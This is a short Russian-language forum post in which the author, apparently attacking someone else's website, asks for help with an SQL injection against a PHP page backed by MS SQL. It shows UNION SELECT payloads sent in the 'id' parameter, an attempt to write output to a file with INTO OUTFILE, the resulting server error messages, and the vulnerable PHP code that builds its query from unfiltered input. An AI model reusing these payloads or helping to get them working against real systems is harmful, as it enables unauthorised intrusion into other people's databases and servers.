Здравствуйте, мне нужна ваша помощь.
На уязвимой странице происходит передача параметра без фильтрации, он есть особенность- значения полей не выводятся на странице, а на основе данных рисуется карта (это не важно, т.к в базе нет паролей). Я пытаюсь сделать вывод в файл с помощью INTO OUTFILE , но получаю ошибку.
Я отправляю
?id=1122+UNION+SELECT+1,2+FROM+locations+INTO+OUTF ILE+'name'
(OUTFILE я пишу одним словом, без пробела Ж)
Выдает такое
Код:
Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near the keyword 'INTO'. (severity 15) in E:\XAMPPLITE\htdocs\info\pages\map.php on line 7
Warning: mssql_query() [function.mssql-query]: Query failed in E:\XAMPPLITE\htdocs\info\pages\map.php on line 7
Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource in E:\XAMPPLITE\htdocs\info\pages\map.php on line 8
А если запрос такой
?id=1122+UNION+SELECT+1,2+FROM+locations
всё нормально, без ошибок
PHP скрипт там такой
PHP код:
$result = mssql_query("SELECT *
FROM locations
WHERE id = $id;");
Со скриптом возможна неточность (врядли), тк на сервере стоит немного другая версия.
Всё вроде бы очень просто, но я не пойму что это за неправильный синтаксис возле INTO... Помогите разобраться